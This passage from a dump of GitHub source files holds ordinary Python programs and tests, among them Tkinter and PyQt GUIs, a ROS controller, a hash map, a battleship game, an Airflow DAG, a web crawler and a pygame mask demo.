#working\r\n\r\n elif( event == \"delete\"):\r\n list.remove(''.join(value[\"list\"]))\r\n window.FindElement(\"list\").Update(list)\r\n window.Element(\"tell\").Update(\"entry deleted\")\r\n file.writeFile(list) #working\r\n\r\n elif( event == \"prioritize\"):\r\n for i in range(len(list)):\r\n min = i\r\n for j in range(i+1, len(list)):\r\n if(list[min][-1] > list[j][-1]):\r\n min = j\r\n list[i],list[min] = list[min],list[i]\r\n window.FindElement(\"list\").Update(list)\r\n window.Element(\"tell\").Update(\"prioritized\")\r\n file.writeFile(list) #working\r\n\r\n elif( event == \"finished\"):\r\n list.remove(''.join(value[\"list\"]))\r\n done.append(''.join(value[\"list\"]))\r\n window.FindElement(\"list\").Update(list)\r\n window.FindElement(\"complete\").Update(done)\r\n window.Element(\"tell\").Update(\"item completed\")\r\n file.writeCompleted(done) #working\r\n\r\n\r\nwindow.Close()\r\n","repo_name":"KRITHIKVASAN/_programs_","sub_path":"todolist_using_file_concept.py","file_name":"todolist_using_file_concept.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26743481346","text":"import tkinter as tk\r\nimport datetime\r\nimport winsound\r\n\r\ndef set_alarm():\r\n alarm_time = entry.get()\r\n try:\r\n alarm_hour = int(alarm_time[:2])\r\n alarm_minute = int(alarm_time[3:])\r\n now = datetime.datetime.now()\r\n alarm = now.replace(hour=alarm_hour, minute=alarm_minute, second=0, microsecond=0)\r\n time_difference = alarm - now\r\n if time_difference.total_seconds() < 0:\r\n alarm = alarm.replace(day=alarm.day + 1)\r\n time_difference = alarm - now\r\n status_label.config(text=f\"Alarm set for {alarm_time}\")\r\n root.after(int(time_difference.total_seconds() * 1000), play_alarm)\r\n except ValueError:\r\n status_label.config(text=\"Invalid time format!\")\r\n\r\ndef play_alarm():\r\n winsound.PlaySound(\"sound.wav\", winsound.SND_ASYNC)\r\n status_label.config(text=\"Wake up!\")\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Alarm Clock\")\r\n\r\nlabel = tk.Label(root, text=\"Enter alarm time (HH:MM):\")\r\nlabel.pack()\r\n\r\nentry = tk.Entry(root)\r\nentry.pack()\r\n\r\nbutton = tk.Button(root, text=\"Set Alarm\", command=set_alarm)\r\nbutton.pack()\r\n\r\nstatus_label = tk.Label(root, text=\"\")\r\nstatus_label.pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"inferno00134/alarm-clock-using-GUI-codeclause","sub_path":"GUI.py/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73809283410","text":"#!/usr/bin/python\n\nimport rospy\nfrom nav_msgs.msg import Odometry\nfrom tf.transformations import euler_from_quaternion as euler_fq\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import Twist\nfrom geometry_msgs.msg import PointStamped\nfrom geometry_msgs.msg import PoseStamped\nimport numpy as np\nfrom math import atan2\n\n\nx = 0.0\ny = 0.0\ntheta = 0.0\n\nu_0 = [0.0, 0.0]\n\nx_odom = 0.0\ny_odom = 0.0\n\n\n# Callbak function\ndef newPos(msg) :\n\n print(\"newPos Callback\")\n global x\n global y\n global theta\n\n x = msg.pose.position.x\n y = msg.pose.position.y\n\n rot_q = msg.pose.orientation\n (roll, pitch, theta) = euler_fq([rot_q.x, rot_q.y, rot_q.z, rot_q.w])\n #theta = yaw;\n\n# Callbak function\ndef newOdom(msg) :\n global x_odom\n global y_odom\n global theta_odom\n\n x_odom = msg.pose.pose.position.x\n y_odom = msg.pose.pose.position.y\n\n 
rot_q = msg.pose.pose.orientation\n (roll, pitch, theta_odom) = euler_fq([rot_q.x, rot_q.y, rot_q.z, rot_q.w])\n #theta = yaw;\n\nrospy.init_node(\"position_controller\")\n\nsub_pos = rospy.Subscriber(\"/slam_out_pose\", PoseStamped, newPos)\nsub = rospy.Subscriber(\"/odom\", Odometry, newOdom)\n\npub = rospy.Publisher(\"/cmd_vel\", Twist, queue_size=1)\n\nspeed = Twist()\n\nh = 1\nrate = rospy.Rate(1/h)\n\nwhile not rospy.is_shutdown():\n try:\n # if x > 2:\n # speed.linear.x = 0.0\n # else:\n # \n speed.linear.x = 0.0\n speed.angular.z = 1.0\n except(ValueError, TypeError):\n speed.linear.x = 0.0\n speed.angular.z = 0.0\n pub.publish(speed)\n rate.sleep()","repo_name":"filipkro/hrp_mpc_lidar","sub_path":"mpc1/src/test_params.py","file_name":"test_params.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8094410812","text":"'''\n\n# tests/test_espn_fantasy.py\n\n'''\n\nimport logging\nimport os\nimport random\nimport sys\nimport unittest\n\nfrom nflfantasy.espn_fantasy import Scraper, Parser\n\n\nclass ESPN_fantasy_test(unittest.TestCase):\n '''\n Tests espn_fantasy scraper and parser\n '''\n\n @property\n def pos(self):\n return random.choice(['qb', 'rb', 'wr', 'k', 'te'])\n\n def offset(self, pos=None):\n if not pos:\n pos = self.pos\n if pos == 'k':\n return 0\n elif pos in ['qb', 'te']:\n return random.choice([0, 50])\n else:\n return random.choice([0, 50, 100])\n\n def setUp(self):\n \"\"\"\n\n \"\"\"\n self.s = Scraper(username=os.getenv('ESPN_FANTASY_USERNAME'),\n password=os.getenv('ESPN_FANTASY_PASSWORD'),\n profile=os.getenv('FIREFOX_PROFILE'))\n self.p = Parser()\n self.leagueId = os.getenv('ESPN_FANTASY_LEAGUE_ID')\n self.teamId = os.getenv('ESPN_FANTASY_TEAM_ID')\n self.seasonId = os.getenv('ESPN_FANTASY_SEASON_ID')\n\n @unittest.skip\n def test_fantasy_league_rosters(self):\n content = self.s.fantasy_league_rosters(self.leagueId)\n self.assertIsNotNone(content)\n self.assertIn('QB', content)\n players = self.p.fantasy_league_rosters(content)\n self.assertIsNotNone(players)\n\n @unittest.skip\n def test_fantasy_team_roster(self):\n content = self.s.fantasy_team_roster(league_id=self.leagueId,team_id=self.teamId, season=self.seasonId)\n self.assertIn('Acquisitions', content)\n players = self.p.fantasy_team_roster(content)\n self.assertIsNotNone(players)\n\n @unittest.skip\n def test_waiver_wire(self):\n # league_id, team_id, season\n content = self.s.fantasy_waiver_wire(self.leagueId, self.teamId, self.seasonId)\n self.assertIn('/ffl/freeagency?', content)\n\n # league_id, team_id, season, start_index=None\n pos = self.pos\n content = self.s.fantasy_waiver_wire(self.leagueId, self.teamId, self.seasonId, self.offset())\n self.assertIn('/ffl/freeagency?', content)\n\n # league_id, team_id, season, start_index=None, position=None\n pos = self.pos\n content = self.s.fantasy_waiver_wire(self.leagueId, self.teamId, self.seasonId, self.offset(pos), pos)\n self.assertIn('/ffl/freeagency?', content)\n\n players = self.p.fantasy_waiver_wire(content)\n self.assertIsNotNone(players)\n\n\nif __name__=='__main__':\n logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n unittest.main()\n","repo_name":"sansbacon/nflfantasy","sub_path":"tests/test_espn_fantasy.py","file_name":"test_espn_fantasy.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"21802126259","text":"import 
sys\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton\nfrom PyQt5 import QtCore\n\nclass Window(QMainWindow):\n \n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 500, 300)\n self.setWindowTitle(\"Test example 1\")\n self.home()\n \n def home(self):\n btn = QPushButton(\"Quit\", self)\n btn.clicked.connect(QtCore.QCoreApplication.instance().quit)\n self.show()\n \n \ndef run():\n app = QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n \n \nrun()\n","repo_name":"4m1g0/PyQt_Demo","sub_path":"example2_buttom.py","file_name":"example2_buttom.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"39552024009","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport PIL.Image as Image\n\nimage = Image.open('img4.jpg')\nimage = np.array(image.getdata())\n\n# make the data\nx = image[0:2000:2]\ny = image[1:2000:2]\n\n# plot\nfig, ax = plt.subplots()\n\nplt.ylabel(f'Нечетные пиксели')\nplt.xlabel(f'Четные пиксели\\n(pixels.py)')\nax.scatter(x, y, s=3)\n\nplt.show()\n","repo_name":"sh1rokovs/Diploms_programms_and_components","sub_path":"Bachelor/new_diplom_files/pixels.py","file_name":"pixels.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18805797131","text":"from project import Truss, Brace, Node\r\nn1 = Node(\"a\",0,1)\r\nn2 = Node(\"b\",1,1)\r\nn3 = Node(\"c\",0,0)\r\nn4 = Node(\"d\",2,0)\r\nb1 = Brace(\"beam 1\",n1,n2)\r\nb2 = Brace(\"beam 2\",n3,n2)\r\nb3 = Brace(\"beam 3\",n3,n4)\r\nb4 = Brace(\"beam 4\",n2,n4)\r\nt = Truss([n1,n2,n3,n4])\r\nanswer = t.calculate(upward_force = 1000)\r\nfor entry in answer:\r\n print(entry + \" \" + str(answer[entry]))\r\n","repo_name":"tyfeeney/truss-structures-numpy","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23726433900","text":"def to_binary(num):\n result = []\n while num >= 1:\n yushu = num%2\n result.append(yushu)\n num = num//2\n return ''.join([str(i) for i in result[::-1]])\n\nif __name__ == '__main__':\n print(to_binary(4))\n","repo_name":"wuyuzhou12345/language_points","sub_path":"面试题目/binary_system.py","file_name":"binary_system.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4416381812","text":"# coding: utf-8\n\"\"\"\nLinearProbingHashMap uses Linear Probing (one of Open Addressing methods) as collision resolution strategy.\n\nhttps://en.wikipedia.org/wiki/Linear_probing\n\"\"\"\nfrom data_structures.hash_maps.base_map import BaseHashMap\n\n\nclass LinearProbingHashMap(BaseHashMap):\n AVAILABLE_MARKER = object()\n\n # O(n)\n def __iter__(self):\n for item in self._bucket_array:\n if not self._is_empty_or_available(item):\n yield item.key\n\n # O(1) + O(fairly small n) for probing if the load factor is below 1\n def _is_empty_or_available(self, item):\n return (item is None) or (item is self.AVAILABLE_MARKER)\n\n # O(1) + O(fairly small n) for probing if the load factor is below 1\n # O(n) if it triggers resizing\n def __setitem__(self, key, value):\n index = self._hash_func(key)\n while True:\n item = self._bucket_array[index]\n if self._is_empty_or_available(item):\n # Both empty or available bucket can be 
inserted.\n self._bucket_array[index] = self.ITEM_CLASS(key, value)\n self._size += 1\n self._auto_resize()\n return\n else:\n if item.key == key:\n item.value = value\n return\n else:\n # item.key != key means A[i] is already occupied by another key,\n # So we try to insert the item at A[(i + 1) mod N], A[(i + 2) mod N], and so on.\n pass\n\n index = (index + 1) % len(self._bucket_array)\n\n # O(1) + O(fairly small n) for probing if the load factor is below 1\n def __getitem__(self, key):\n \"\"\"\n We can only stop searching consecutive slots for key when we encounter an \"empty\" bucket or the item with that key.\n If we encounter available markers, we simply skip them.\n \"\"\"\n index = self._hash_func(key)\n while True:\n item = self._bucket_array[index]\n if self._is_empty_or_available(item):\n if item is None:\n raise KeyError\n else:\n if item.key == key:\n return item.value\n\n index = (index + 1) % len(self._bucket_array)\n\n # O(1) + O(fairly small n) for probing if the load factor is below 1\n def __delitem__(self, key):\n index = self._hash_func(key)\n while True:\n item = self._bucket_array[index]\n if self._is_empty_or_available(item):\n if item is None:\n raise KeyError\n else:\n if item.key == key:\n self._bucket_array[index] = self.AVAILABLE_MARKER\n self._size -= 1\n return\n\n index = (index + 1) % len(self._bucket_array)\n","repo_name":"vinta/fuck-coding-interviews","sub_path":"data_structures/hash_maps/linear_probing_hash_map.py","file_name":"linear_probing_hash_map.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":652,"dataset":"github-code","pt":"66"} +{"seq_id":"14285133773","text":"#!/usr/bin/env python\n\nimport toolforge\nimport pickle\nimport argparse\n\nfrom datetime import datetime\n\nparser = argparse.ArgumentParser(description=\"Dump orphaned talk pages to a pickle file\")\nparser.add_argument(\"wiki\", help=\"Wiki database code\")\nparser.add_argument(\"limit\", help=\"Return at most this many rows\")\nargs = parser.parse_args()\n\nwiki = args.wiki\nlimit = int(args.limit)\n\nconn = toolforge.connect(wiki)\n\ng8 = []\n\nwith conn.cursor() as cur:\n\tnow = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\tprint(\"{} - Running orphaned talk/CSD G8 candidate query on wiki {}\".format(now, wiki))\n\tcur.execute(\"SELECT page_namespace, page_title FROM page talkpage WHERE talkpage.page_title NOT LIKE '%/%' AND talkpage.page_namespace IN (1,5,11,15,101,109,119,829) AND NOT EXISTS ( SELECT 1 FROM page mainpage WHERE mainpage.page_namespace=talkpage.page_namespace-1 AND mainpage.page_title=talkpage.page_title ) AND NOT EXISTS ( SELECT 1 FROM templatelinks WHERE talkpage.page_id=tl_from AND tl_title='G8-exempt' ) LIMIT 1000\".format(limit))\n\tg8 = [(ns, e.decode(\"utf-8\")) for ns, e in list(cur.fetchall())]\n\npickle.dump(g8, open(\"/data/project/fireflytools/www/python/src/data/g8_candidates_{}.dat\".format(wiki), \"wb\"))\n","repo_name":"rwjuk/fireflytools","sub_path":"g8_candidates.py","file_name":"g8_candidates.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4948057552","text":"\"\"\"\n関数\n- input_from_stdin()\n- input_from_file(path)\n\"\"\"\n\nimport segments as sg\n# segmentsモジュールをsegとして使える\nimport path\n# 標準ライブラリpathをインポート\n\n\ndef input_from_stdin():\n # 修正したinput_infoを移行する\n points = []\n # pointsをリスト型で定義。\n segments = []\n # segmentsをリスト型で定義。\n tmp = input(\"\") # \"4 2 0 0\"\n tmp = 
tmp.split(\" \") # [\"4\", \"2\", \"0\", \"0\"]\n # tmpに文字型の数字を格納。\n for i in range(len(tmp)):\n # iをtmpの大きさ分ループさせる\n tmp[i] = int(tmp[i])\n # [4, 2, 0, 0]\n N, M, P, Q = tmp\n # N = tmp[0] , M = tmp[1] , P = tmp[2] , Q = tmp[3]\n for i in range(N): # for N回まわしてなかでinput\n tmp = input(\"\")\n tmp = tmp.split(\" \") # \"0 0\" -> [\"0\", \"0\"]\n tmp[0] = int(tmp[0])\n # 数値型で格納。\n tmp[1] = int(tmp[1])\n # point([0, 0])\n points.append(sg.point(tmp)) # points.append(point(koshikawa))\n\n for i in range(M): # for m\n tmp = input()\n tmp = tmp.split(\" \")\n # \"0 0\" -> koshikawa = [0, 0]\n tmp[0] = int(tmp[0])\n # 数値型で格納。\n tmp[1] = int(tmp[1])\n segments.append(\n sg.segment([points[tmp[0]-1], points[tmp[1]-1]]))\n # segments.append(segment(koshikawa))\n\n \"\"\"\n roots [\n [\"1\", \"4\", 1],\n [\"C1\", \"3\", 1]\n ]\n \"\"\"\n\n roots = []\n # root情報\n\n add_points = []\n # 追加で入力した座標の値\n for i in range(P):\n tmp = input(\"\")\n tmp = tmp.split(\" \")\n tmp[0] = int(tmp[0])\n tmp[1] = int(tmp[1])\n add_points.append(sg.point(tmp))\n\n for i in range(Q):\n tmp = input(\"\")\n tmp = tmp.split(\" \")\n tmp[2] = int(tmp[2])\n # tmp = [\"1\", \"4\", 1]\n roots.append(tmp)\n\n for i in range(Q):\n tmp = input(\"\")\n tmp = tmp.split(\" \")\n roots[i] = tmp\n roots[i][2] = int(tmp[i][2])\n\n return N, M, P, Q, points, segments, add_points, roots\n\n\ndef input_from_file(path=path.input_path):\n with open(path, \"r\") as f:\n tmp = f.readlines()\n N, M, P, Q = [int(x) for x in tmp[0].replace(\"\\n\", \"\").split(\" \")]\n points = []\n segments = []\n roots = []\n add_points = []\n\n for i in range(1, N+1): # points\n points.append(\n sg.point([int(x)\n for x in tmp[i].replace(\"\\n\", \"\").split(\" \")])\n )\n for j in range(N+1, N+M+1): # segments\n tmp2 = [int(x) for x in tmp[j].replace(\"\\n\", \"\").split(\" \")]\n segments.append(sg.segment([\n points[tmp2[0]-1],\n points[tmp2[1]-1]\n ]))\n for k in range(N+M+1, N+M+P+1): # add points\n # 詳しい使い方が不明なのでとりあえずpointsに追加だけする\n adds = [int(x) for x in tmp[k].replace(\"\\n\", \"\").split(\" \")]\n add_points.append(sg.point(adds))\n for l in range(N+M+P+1, N+M+P+Q+1): # root\n roots.append([x for x in tmp[l].replace(\"\\n\", \"\").split(\" \")])\n\n return N, M, P, Q, points, segments, add_points, roots\n","repo_name":"ie03-aizu-2019/ie03project-skys","sub_path":"source/Modules/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31881432376","text":"from space import *\nfrom ships import *\nfrom fleet import *\nimport random\n\nclass Ocean: \n def __init__(self):\n self._width = 10\n self._height = 10\n self.ocean = []\n self.open_ocean_positions = []\n self.create_empty_ocean()\n \n def create_empty_ocean(self):\n for column in range(self._width):\n self.ocean.append([])\n for row in range(self._height):\n self.ocean[column].append(Space()) \n position = (row, column)\n self.open_ocean_positions.append(position) \n \n def display_ocean(self):\n for i in range(self.get_width()):\n if i == 0: print(' ', end = \" \")\n print(i, end = \" \")\n print('\\n')\n \n for i in range(self.get_width()):\n print(i, end = \" \")\n for j in range(self.get_height()):\n print(self.get_char_at(i, j), end = \" \")\n print('\\n')\n \n def get_width(self):\n return self._width\n \n def get_height(self):\n return self._height\n \n def is_open_position(self, position):\n return (position in self.open_ocean_positions) \n \n def 
is_open_sea(self, row, column):\n position = (row, column)\n return self.is_open_position(position)\n \n def set_space_at(self, row, column, space):\n self.ocean[row][column] = space\n \n def get_space_at(self, row, column):\n return self.ocean[row][column]\n \n def get_char_at(self, row, column):\n return self.get_space_at(row, column).get_char_representation()\n \n def get_type_at(self, row, column):\n return self.get_space_at(row, column).get_ship_type()\n \n def get_surrounding_positions(self, position):\n surrounding_positions = set()\n row = position[0]\n column = position[1]\n \n surrounding_positions.add((row-1, column-1))\n surrounding_positions.add((row-1, column))\n surrounding_positions.add((row-1, column+1))\n surrounding_positions.add((row, column-1))\n surrounding_positions.add((row, column))\n surrounding_positions.add((row, column+1))\n surrounding_positions.add((row+1, column-1))\n surrounding_positions.add((row+1, column))\n surrounding_positions.add((row+1, column+1))\n \n return surrounding_positions\n\n def take_shot(self, row, column):\n position = self.get_space_at(row, column)\n\n if position.get_type() == \"Space\":\n position.check_shot(position)\n elif position.get_type() == \"Position\":\n position.get_ship().check_shot(position)\n \n def get_closed_positions(self, row, column, ship, horizontal):\n resulting_closed_positions = set()\n for i in range(ship.get_length()):\n if horizontal:\n position = (row, column+i)\n ship.add_position(row, column+i) \n self.set_space_at(row, column+i, ship.get_position(row, column+i))\n else:\n position = (row+i, column)\n ship.add_position(row+i, column) \n self.set_space_at(row+i, column, ship.get_position(row+i, column))\n resulting_closed_positions.add(position)\n resulting_closed_positions = resulting_closed_positions.union(self.get_surrounding_positions(position))\n return resulting_closed_positions\n \n def remove_closed_positions(self, positions):\n for position in positions:\n if position in self.open_ocean_positions:\n self.open_ocean_positions.remove(position)\n \n def get_open_positions(self, ship=None, horizontal=-1):\n \n if horizontal == -1:\n return self.open_ocean_positions\n \n return_positions = self.open_ocean_positions[:]\n\n if horizontal:\n for position in self.open_ocean_positions:\n if (position[1] + ship.get_length()) > self._width:\n return_positions.remove(position)\n else:\n for i in range(ship.get_length()):\n if ((position[0], position[1]+i) not in self.open_ocean_positions):\n return_positions.remove(position)\n break\n else:\n for position in self.open_ocean_positions:\n if (position[0] + ship.get_length()) > self._height:\n return_positions.remove(position)\n else:\n for i in range(ship.get_length()):\n if ((position[0]+i, position[1]) not in self.open_ocean_positions):\n return_positions.remove(position)\n break\n \n return return_positions\n \n def place_ship_at(self, row, column, ship, horizontal):\n ship.set_horizontal_bool(horizontal)\n ship.set_starting_row(row)\n ship.set_starting_column(column)\n \n resulting_closed_positions = self.get_closed_positions(row, column, ship, horizontal) \n self.remove_closed_positions(list(resulting_closed_positions))\n \n def build_basic_fleet(self, fleet):\n for i in range(fleet.get_capacity()):\n if i < 1:\n ship = Battleship()\n elif i < 3:\n ship = Cruiser()\n elif i < 6:\n ship = Destroyer()\n else:\n ship = Submarine()\n open_positions = self.get_open_positions(ship, horizontal=True)\n row = open_positions[0][0]\n column = open_positions[0][1]\n 
self.place_ship_at(row, column, ship, horizontal=True)\n fleet.add_ship(ship)\n \n def build_random_fleet(self, fleet):\n orientation_choices = [True, False]\n for i in range(fleet.get_capacity()):\n if i < 1:\n ship = Battleship()\n elif i < 3:\n ship = Cruiser()\n elif i < 6:\n ship = Destroyer()\n else:\n ship = Submarine()\n horizontal = random.choice(orientation_choices)\n open_positions = self.get_open_positions(ship, horizontal)\n open_position = random.choice(open_positions)\n row = open_position[0]\n column = open_position[1]\n self.place_ship_at(row, column, ship, horizontal)\n fleet.add_ship(ship) \n ","repo_name":"andersgoddard/Battleships","sub_path":"ocean.py","file_name":"ocean.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"1039506376","text":"from airflow.decorators import task\nfrom airflow import DAG\nfrom datetime import timedelta, datetime\nfrom src.google_drive_handler import send_csv_from_disk\n\ndefault_args = {\n 'owner': 'kowal',\n 'retry': 3,\n 'retry_delay': timedelta(minutes=2)\n}\n\nwith DAG(\n dag_id='send_csv_to_google_drive',\n default_args=default_args,\n catchup=False,\n start_date=datetime(2023, 4, 4),\n schedule_interval='@daily',\n tags=['google_drive']\n) as dag:\n @task()\n def send_csv(path):\n send_csv_from_disk(path)\n\n\n @task()\n def second_send_csv(path):\n send_csv_from_disk(path)\n\n\n send_csv('csv1/test_file.csv') >> second_send_csv('est2.csv')\n","repo_name":"krkowal/AirflowProject","sub_path":"dags/send_csv_to_google_drive.py","file_name":"send_csv_to_google_drive.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33676221972","text":"# -*- coding: utf-8 -*\nimport base64\n\nimport mock\nfrom nose.tools import (\n assert_raises,\n eq_,\n)\nfrom passport.backend.oauth.admin.admin.utils import (\n AmCredentialsManager,\n DecryptFailedError,\n)\nfrom passport.backend.oauth.core.test.framework import BaseTestCase\n\n\nTEST_SECRET = base64.b64encode(b'b' * 16).decode()\n\n\nclass AmCredentialsManagerTestcase(BaseTestCase):\n def setUp(self):\n super(AmCredentialsManagerTestcase, self).setUp()\n self.manager = AmCredentialsManager(b64_secret=TEST_SECRET)\n self.manager._make_random_text = mock.Mock(side_effect=lambda length: 'c' * length)\n self.cases = (\n ('a' * 32, 'DhuK/DPxVGL8YBY/HgyQ6YPU9ZTErWP+iOGo7hrFj+VgYyew1SoGzd6z/tM+18MW'),\n )\n\n def test_encrypt_ok(self):\n for from_, to_ in self.cases:\n eq_(\n self.manager.encrypt(from_),\n to_,\n )\n\n def test_decrypt_ok(self):\n for from_, to_ in self.cases:\n decrypted, padding = self.manager.decrypt(to_)\n eq_(\n decrypted,\n from_,\n )\n eq_(\n padding,\n 'c' * (15 - len(from_) % 16),\n )\n\n def test_decrypt_error(self):\n for bad_value in (\n 'foo',\n base64.b64encode(b'foo').decode(),\n ):\n with assert_raises(DecryptFailedError):\n self.manager.decrypt(bad_value)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"passport/tests/test_utils (16).py","file_name":"test_utils (16).py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16346179421","text":"import datetime\n\nfrom models.user import User\nfrom modules.db_session_manage import DBSessionManage\n\n\nclass UserModule(object):\n \"\"\"Class for UserModule\"\"\"\n\n def create(self, params, database):\n 
\"\"\"\n Create user\n :param dict params: params to create user\n :param str database: Database\n :return User\n \"\"\"\n db_session = DBSessionManage(database).get_db_session()\n try:\n user = User(database)\n user = self.set_user(user, params)\n\n db_session.add(user)\n db_session.commit()\n\n return user\n\n except:\n db_session.rollback()\n db_session.close()\n raise\n\n def update(self, user, params, db_session):\n \"\"\"\n Update user\n :param dict params: params to update user\n :param session db_session: Database session\n \"\"\"\n if not user:\n raise Exception('UserModule: User is required', 400)\n\n try:\n user.fullname = params.get('fullname')\n\n user.updated_at = datetime.datetime.now()\n\n db_session.add(user)\n db_session.commit()\n\n except:\n db_session.rollback()\n db_session.close()\n raise\n\n def delete(self, user, db_session):\n \"\"\"\n Delete user\n :param dict user: User to delete\n :param session db_session: Database session\n \"\"\"\n try:\n db_session.delete(user)\n db_session.flush()\n db_session.commit()\n\n except:\n db_session.rollback()\n db_session.close()\n raise\n\n @classmethod\n def search_by_filter_params(cls, params, database):\n \"\"\"\n Search users by filter params\n :param dict params: Request params\n :param str database: Database\n :return dict: Search users response\n \"\"\"\n db_session = DBSessionManage(database).get_db_session()\n\n users, count = User.get_by_filter_params(params, database)\n\n response = cls.get_default_response()\n response['count'] = count\n response['users'] = cls.users_to_dict(users, db_session)\n\n db_session.close()\n\n return response\n\n @classmethod\n def set_user(cls, user, params):\n \"\"\"\n Set fields values of User\n :param user user: User model\n :param dict params: User params\n :param session db_session: Database session\n :return User\n \"\"\"\n setattr(user, 'fullname', params.get('fullname'))\n\n return user\n\n @classmethod\n def users_to_dict(cls, users, db_session):\n \"\"\"\n Return users in dict format\n :param list of user: List with users\n :param session db_session: Database session\n :return list(dict): List with users in dict format\n \"\"\"\n users_dict = []\n for user in users:\n user_dict = {\n 'id': user.id,\n 'created_at': user.created_at,\n 'fullname': user.fullname,\n 'projects_designated': None,\n 'projects_leader': None,\n 'updated_at': user.updated_at\n }\n cls.set_projects_designated(user.id, user_dict, db_session)\n cls.set_projects_leader(user.id, user_dict, db_session)\n\n users_dict.append(user_dict)\n\n return users_dict\n\n @staticmethod\n def get_default_response():\n \"\"\"\n Get users default response\n :return dict: Users default response\n \"\"\"\n return {\n 'count': 0,\n 'users': []\n }\n\n @staticmethod\n def set_projects_designated(user_id, user_dict, db_session):\n \"\"\"\n Set projects in user dict\n :param int user_id: User id\n :param dict user_dict: User dict\n :param session db_session: Database session\n \"\"\"\n projects_id = []\n projects = User.get_designated_by_project_id(user_id, db_session)\n\n if projects:\n for project in projects:\n projects_id.append(project.id)\n\n user_dict['projects_designated'] = projects_id\n\n @staticmethod\n def set_projects_leader(user_id, user_dict, db_session):\n \"\"\"\n Set projects in user dict\n :param int user_id: User id\n :param dict user_dict: User dict\n :param session db_session: Database session\n \"\"\"\n projects_id = []\n projects = User.get_leader_by_project_id(user_id, db_session)\n\n if projects:\n for project 
in projects:\n projects_id.append(project.id)\n\n user_dict['projects_leader'] = projects_id\n","repo_name":"Dellaquila07/TaskHub-API","sub_path":"modules/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43009176974","text":"# -*- coding: utf-8 -*-\n\"\"\"\nreference: https://stackoverflow.com/questions/1628766/python-package-for-multi-threaded-spider-w-proxy-support\n\"\"\"\n\n\nimport sys\nfrom urllib import urlopen\nfrom BeautifulSoup import BeautifulSoup\nfrom Queue import Queue, Empty\nfrom threading import Thread\n\nvisited = set()\nqueue = Queue()\n\ndef get_parser(host, root, charset):\n\n try:\n while True:\n url = queue.get_nowait()\n try:\n content = urlopen(url).read().decode(charset)\n except UnicodeDecodeError:\n continue\n for link in BeautifulSoup(content).findAll('a'):\n try:\n href = link['href']\n except KeyError:\n continue\n if not href.startswith('http://'):\n href = 'http://%s%s' % (host, href)\n if not href.startswith('http://%s%s' % (host, root)):\n continue\n if href not in visited:\n visited.add(href)\n queue.put(href)\n print(href)\n except Empty:\n pass\n\nif __name__ == '__main__':\n host, root, charset = sys.argv[1:]\n queue.put('http://%s%s' % (host, root))\n workers = []\n for i in range(5):\n worker = Thread(target=get_parser, args=(host, root, charset))\n worker.start()\n workers.append(worker)\n for worker in workers:\n worker.join()\n","repo_name":"sunggeunkim/datastructure","sub_path":"multithread/web_crawler_thread.py","file_name":"web_crawler_thread.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16717872865","text":"# pygame.mask module\n# https://www.pygame.org/docs/ref/mask.html\n#\n# pygame.sprite module\n# https://www.pygame.org/docs/ref/sprite.html\n#\n# How would I make color collision using pygame.mask?\n# https://stackoverflow.com/questions/65981815/how-would-i-make-color-collision-using-pygame-mask/65982315#65982315\n#\n# GitHub - Sprite, Group and Sprite mask - Sprite mask\n# https://github.com/Rabbid76/PyGameExamplesAndAnswers/blob/master/documentation/pygame/pygame_sprite_and_sprite_mask.md\n#\n# https://replit.com/@Rabbid76/PyGame-SpriteMask\n\nimport pygame\n\ndef ColorMask(image, mask_color):\n mask_image = image.convert()\n mask_image.set_colorkey(mask_color)\n mask = pygame.mask.from_surface(mask_image)\n mask.invert()\n return mask\n\npygame.init()\nwindow = pygame.display.set_mode((450, 250))\n\ntest_image = pygame.Surface((200, 200), 